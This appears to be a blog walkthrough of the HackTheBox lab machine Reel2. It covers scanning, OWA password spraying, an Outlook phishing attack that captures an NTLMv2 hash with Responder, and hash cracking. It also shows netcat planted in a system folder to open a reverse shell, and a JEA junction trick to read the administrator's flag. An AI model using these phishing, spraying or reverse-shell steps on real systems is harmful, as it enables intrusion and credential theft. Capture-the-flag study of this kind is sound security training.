Reel2 - [HTB]

Cover Image for Reel2 - [HTB]

Table of Contents


    Reel2 is a hard Windows HackTheBox machine where the attacker will have to craft some credentials for a phishing attack. Then, he or she will have to crack a NTLMv2 hash to get login in the machine, obtaining the user flag. Finally, in order to become root, the attacker will have to play with a powershell session and symbolic links in order to get access to the root's desktop.


    As always, let's start checking if there are some opened ports.

    kali@kali:$ sudo nmap -sS -p- -n -T5 --open -oN AllPorts.txt
    # Nmap 7.91 scan initiated Sat Jan 30 05:14:48 2021 as: nmap -sS -p- -n -T5 --open -oN AllPorts.txt
    Nmap scan report for
    Host is up (0.043s latency).
    Not shown: 65519 filtered ports
    Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
    80/tcp   open  http
    443/tcp  open  https
    5985/tcp open  wsman
    6001/tcp open  X11:1
    6002/tcp open  X11:2
    6004/tcp open  X11:4
    6005/tcp open  X11:5
    6006/tcp open  X11:6
    6007/tcp open  X11:7
    6008/tcp open  X11:8
    6010/tcp open  x11
    6011/tcp open  x11
    6012/tcp open  x11
    6017/tcp open  xmail-ctrl
    6022/tcp open  x11
    8080/tcp open  http-proxy

    Then, we continue scanning all open ports.

    kali@kali:$ sudo nmap -sC -sV -T5 -p80,443,5985,6001,6002,6004,6005,6006,6007,6008,6010,6011,6012,6017,6022,8080 -n -oN PortsInDepth.txt
    80/tcp   open  http       Microsoft IIS httpd 8.5
    |_http-server-header: Microsoft-IIS/8.5
    |_http-title: 403 - Forbidden: Access is denied.
    443/tcp  open  ssl/https?
    | ssl-cert: Subject: commonName=Reel2
    | Subject Alternative Name: DNS:Reel2, DNS:Reel2.htb.local
    | Not valid before: 2020-07-30T10:12:46
    |_Not valid after:  2025-07-30T10:12:46
    |_ssl-date: 2021-01-30T10:56:24+00:00; +9m11s from scanner time.
    5985/tcp open  http       Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
    |_http-server-header: Microsoft-HTTPAPI/2.0
    |_http-title: Not Found
    6001/tcp open  ncacn_http Microsoft Windows RPC over HTTP 1.0
    6002/tcp open  ncacn_http Microsoft Windows RPC over HTTP 1.0
    6004/tcp open  ncacn_http Microsoft Windows RPC over HTTP 1.0
    6005/tcp open  msrpc      Microsoft Windows RPC
    6006/tcp open  msrpc      Microsoft Windows RPC
    6007/tcp open  msrpc      Microsoft Windows RPC
    6008/tcp open  msrpc      Microsoft Windows RPC
    6010/tcp open  ncacn_http Microsoft Windows RPC over HTTP 1.0
    6011/tcp open  msrpc      Microsoft Windows RPC
    6012/tcp open  msrpc      Microsoft Windows RPC
    6017/tcp open  msrpc      Microsoft Windows RPC
    6022/tcp open  msrpc      Microsoft Windows RPC
    8080/tcp open  http       Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.2.32)
    | http-cookie-flags: 
    |   /: 
    |     PHPSESSID: 
    |_      httponly flag not set
    |_http-open-proxy: Proxy might be redirecting requests
    |_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.2.32
    |_http-title: Welcome | Wallstant
    Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

    Launching dirbuster to port 443, we can discover several directories.

    kali@kali:/mnt/hgfs/2_MisPostsBlog/HTB/Reel2$ gobuster dir -t 20 -k -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt
    Gobuster v3.0.1
    by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
    [+] Url:  
    [+] Threads:        20
    [+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
    [+] Status codes:   200,204,301,302,307,401,403
    [+] User Agent:     gobuster/3.0.1
    [+] Extensions:     php,html,txt
    [+] Timeout:        10s
    2021/01/30 06:42:45 Starting gobuster
    /public (Status: 302)
    /exchange (Status: 302)
    /Public (Status: 302)
    /rpc (Status: 401)
    /owa (Status: 301)
    /Exchange (Status: 302)
    /ecp (Status: 301)
    /RPC (Status: 401)
    [ERROR] 2021/01/30 06:50:27 [!] Get net/http: request canceled (Client.Timeout exceeded while awaiting headers)
    /ews (Status: 301)
    /PUBLIC (Status: 302)
    /exchweb (Status: 302)
    2021/01/30 07:15:12 Finished

    However, the only ones that we should care about are /rpc and /owa.


    Furthemore, at the 8080 port there is a social network application.


    Because, the machine's icon show some fishing rods, it seems that we need to do some kind of fishing attacks in order to impersonate somebody. Moreover, the social network application doesn't seem vulnerable to any kind of exploit. Hence, let's try obtaining some credentials by gathering information at "Wallstant".

    At http://reel2.htb:8080/search we can obtain all users registered at "Wallstant", with the following JavaScript.

    var texto = '';
    $('.user_follow_box_a').each(function() {
        var line = $(this).html();
        try {
            var username = line.split('@')[1].split('<')[0];
            texto += username+'\n';
        } catch {}
    Wallstant users

    However, we are only going to keep the usernames who have an associated post on the social network, because they seems to be active in the machie. These usernames are going to be used to create a username list with hashcat.

    cube post
    svensson post
    kali@kali:~$ cat users.txt 
    kali@kali:~$ hashcat -r /usr/share/hashcat/rules/generated.rule --wordlist users.txt --stdout > usernames.txt

    Furthermore, we are going to use the words inside each post with the purpose of creating possible passwords with hashcat that would be used against the users before mentioned.

    kali@kali:~$ cat wordlist.txt 
    kali@kali:~$ /usr/share/hashcat-utils/combinator.bin wordlist.txt wordlist.txt > combinatory.txt
    kali@kali:~$ hashcat -r /usr/share/hashcat/rules/generated.rule --wordlist combinatory.txt --stdout > passwords.txt

    Obtaining credentials

    Using the generated credentials and the Cluster Bomb attack of the tool Burpsuite against the URL /owa/auth.owa, we obtain the credentials:


    Phishing attack

    Note: The Outlook Wep App is in Swedish, but do not worry I will guide you so you will be able to do the attack as well.

    The attack in question is an Outlook phishing attack used by attackers to obtain the victim's NetNTLMv2 hash. Moreover, clicking in "Address Book" we obtain a lot of email addresses, that they will be our victims in this attack.

    Note: In order to send an email: first, click on the "Book"; secondly, select all the users using Ctrl or Shift, thirdly, right click in a contact and finally click on "Nytt meddelande" and "Ja".

    Sending email outlook

    Execute responder with the VPN interface.

    kali@kali:$ sudo responder -I tun0 -v                             
      .----.-----.-----.-----.-----.-----.--|  |.-----.----.                 
      |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|                                
      |__| |_____|_____|   __|_____|__|__|_____||_____|__|  
               NBT-NS, LLMNR & MDNS Responder                                                                                                                                                                          
      Author: Laurent Gaffie (                                                                                                                                         
      To kill this script hit CTRL-C      
     [+] Generic Options:
        Responder NIC              [tun0]
        Responder IP               []
        Challenge set              [random]
        Don't Respond To Names     ['ISATAP']
    [+] Listening for events...

    Finally, send an email with a attached link that points to your machine.


    The result is an NTLMv2 credential.

    [HTTP] Sending NTLM authentication request to
    [HTTP] POST request from:     URL: / 
    [HTTP] Host             : 
    [HTTP] NTLMv2 Client   :
    [HTTP] NTLMv2 Username : htb\k.svensson
    [HTTP] NTLMv2 Hash     : k.svensson::htb:994967cabfdf1e75:3069CE0A0C29E68408C37FD5863B2FE4:0101000000000000C7C545885B08D701E790A8D053DA22B0000000000200060053004D0042000100160053004D0042002D0054004F004F004C004B00490054000400120073006D0062002E006C006F00630061006C000300280073006500720076006500720032003000300033002E0073006D0062002E006C006F00630061006C000500120073006D0062002E006C006F00630061006C00080030003000000000000000000000000040000051C445B8ABE2A131DCAE8CF3E09758D7A7B011A944F1498AA7EEC4211D95AEDB0A001000000000000000000000000000000000000900200048005400540050002F00310030002E00310030002E00310034002E00350036000000000000000000

    Using hashcat we can retrieve the actual password.

    kali@kali:$ hashcat -m 5600 hash3.txt rockyou.txt --show

    Remote Code Execution

    The port 5985 is opened so we can use evil-winrm, but it shows the following error.

    kali@kali:$ evil-winrm -u 'K.SVENSSON' -p 'kittycat1' -i reel2.htb.local
    Evil-WinRM shell v2.3                                                       
    Info: Establishing connection to remote endpoint                                                                                                         
    Evil-WinRM PS The term 'Invoke-Expression' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or i
    f a path was included, verify that the path is correct and try again.    + CategoryInfo          : ObjectNotFound: (Invoke-Expression:String) [], CommandNotFoundException    + FullyQualifi
    edErrorId : CommandNotFoundException>    

    Nonetheless, we can use Powershell in order to execute commands remotely on the machine, obtaining the user flag.

    Note: You can install powershell with following command.

    sudo apt install powershell

    Note1: The powershell commands must be written inside a script block.

    kali@kali:$ pwsh 
    PowerShell 7.0.0
    Copyright (c) Microsoft Corporation. All rights reserved.
    Type 'help' to get help.
       A new PowerShell stable release is available: v7.1.2 
       Upgrade now, or check out the release page at:              
    PS /mnt/hgfs/2_MisPostsBlog/HTB/Reel2> Enter-PSSession –ComputerName reel2.htb -Credential k.svensson  -Authentication Negotiate  
    PowerShell credential request
    Enter your credentials.
    Password for user k.svensson: *********
    [reel2.htb]: PS>&{type C:\Users\k.svensson\Desktop\user.txt}                                             

    Post explotation

    Because, I didn't want to write every time the script block I uploaded a 64 bit windows netcat using the python http module and powershell.

    [reel2.htb]: PS> &{iwr -uri -o "C:\Windows\System32\spool\drivers\color\nc.exe"}
    [reel2.htb]: PS> &{C:\Windows\System32\spool\drivers\color\nc.exe -e powershell.exe 4444}  

    Inside the k.svenssons's desktop there is a windows sticky note, thus going to the sticky notes local storage appears to be a log file named 000003.log.

    PS C:\Users\k.svensson\AppData\Roaming\stickynotes\Local Storage\leveldb> dir -Force
    Mode                LastWriteTime         Length Name                          
    ----                -------------         ------ ----                          
    -a----        2/19/2021   6:49 AM           2695 000003.log                    
    -a----        7/30/2020   1:19 PM             16 CURRENT                       
    -a----        7/30/2020   1:19 PM              0 LOCK                          
    -a----        2/19/2021   6:49 AM            182 LOG                           
    -a----        2/18/2021  12:47 PM            182 LOG.old                       
    -a----        7/30/2020   1:19 PM             41 MANIFEST-000001 

    Using Get-Content shows to little despite the quantity of bytes it has.

    PS C:\Users\k.svensson\AppData\Roaming\stickynotes\Local Storage\leveldb> Get-Content 000003.log
    Get-Content 000003.log

    Hence, I encoded it using base64 so I could download it to my machine, for a later analysis with the command strings.

    PS C:\Users\k.svensson\AppData\Roaming\stickynotes\Local Storage\leveldb> [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($text))
    kali@kali:$ echo L8Oh4oKsdUIAAQEAAAAAAAAAAwAAAAEHVkVSU0lPTg... | base64 -e | strings | more
    {"first":"<p>Credentials for JEA</p><p>jea_test_account:Ab!Q@vcg^%@#1</p>","back":"rgb(255, 242, 171)","title":"rgb(255, 235, 129)","wid":"350","hei":"375","deleted":"no","closed":"yes","locked":"no"}

    Now, we have another pair of credentials, that can also be used for login with powershell.


    However, we need to do it in an alternative way.

    PS /root/Escritorio/Caja HTB> $user = "jea_test_account"
    PS /root/Escritorio/Caja HTB> $pass = ConvertTo-SecureString "Ab!Q@vcg^%@#1" -AsPlainText -Force
    PS /root/Escritorio/Caja HTB> $cred = New-Object System.Management.Automation.PSCredential -ArgumentList ($user, $pass)
    PS /root/Escritorio/Caja HTB> Enter-PSSession -Computer -credential $cred -Authentication Negotiate -ConfigurationName jea_test_account                
    []: PS>

    Furthermore, we can not execute any command due to no-language mode.

    []: PS> &{Get-Command}
    The syntax is not supported by this runspace. This can occur if the runspace is in no-language mode.
        + CategoryInfo          : ParserError: (&{Get-Command}:String) [], ParseException
        + FullyQualifiedErrorId : ScriptsNotAllowed

    Nevertheless, there was a couple of config files at the k.svensson' s Documents folder.

    Mode                LastWriteTime         Length Name                          
    ----                -------------         ------ ----                          
    d-----        7/30/2020   5:14 PM                WindowsPowerShell             
    -a----        7/31/2020  11:58 AM           5600 jea_test_account.psrc         
    -a----        7/31/2020  11:58 AM           2564 jea_test_account.pssc  

    For one side, in the jea_test_account.psrc file we can see the definition of the function Check-File which checks if exists any file in the D: drive, which doesn't exists, or in the C:\ProgramData folder, which exists, and shows its contests.

    PS C:\Users\k.svensson\Documents> type jea_test_account.psrc
    # Functions to define when applied to a session
    FunctionDefinitions = @{
        'Name' = 'Check-File'
        'ScriptBlock' = {param($Path,$ComputerName=$env:COMPUTERNAME) [bool]$Check=$Path -like "D:\*" -or $Path -like "C:\ProgramData\*" ; if($check) {get-content $Path}} }

    For the other side, in the jea_test_account.pssc file we can see: why the jes_test_account is being executed as administrator and the set up of no-language mode.

    PS C:\Users\k.svensson\Documents> type jea_test_account.pssc
    # Whether to run this session configuration as the machine's (virtual) administrator account
    RunAsVirtualAccount = $true
    # User roles (security groups), and the role capabilities that should be applied to them when applied to a session
    RoleDefinitions = @{
        'htb\jea_test_account' = @{
            'RoleCapabilities' = 'jea_test_account' } }
    # Language mode to apply when applied to a session. Can be 'NoLanguage' (recommended), 'RestrictedLanguage', 'ConstrainedLanguage', or 'FullLanguage'
    LanguageMode = 'NoLanguage'

    Therefore, we can deduce that we can read as Administrator any file inside the C:\ProgramData folder using the jea_test_account powershell account.

    Privilege escalation

    Because we have write permissions with the user k.svensson we can create a symbolic link of the Administrator's desktop, thus we can read the root.txt file.

    To tackle this problem we are going to use the cmd terminal, so we can create a folder symbolic link.

    PS C:\ProgramData> cmd.exe
    Microsoft Windows [Version 6.3.9600]
    (c) 2013 Microsoft Corporation. All rights reserved.
    C:\ProgramData>mklink /j Administrator C:\Users\Administrator
    mklink /j Administrator C:\Users\Administrator
    Junction created for Administrator <<===>> C:\Users\Administrator

    Then, we only have to come back the powershell session as jea_test_account, executing the function Check-File passing as argument the path of the root.txt file, obtaining the root's flag.

    []: PS>Check-File C:\ProgramData\Administrator\Desktop\root.txt

    Finally, I would like to thanks xavilok, who helped me completing the machine.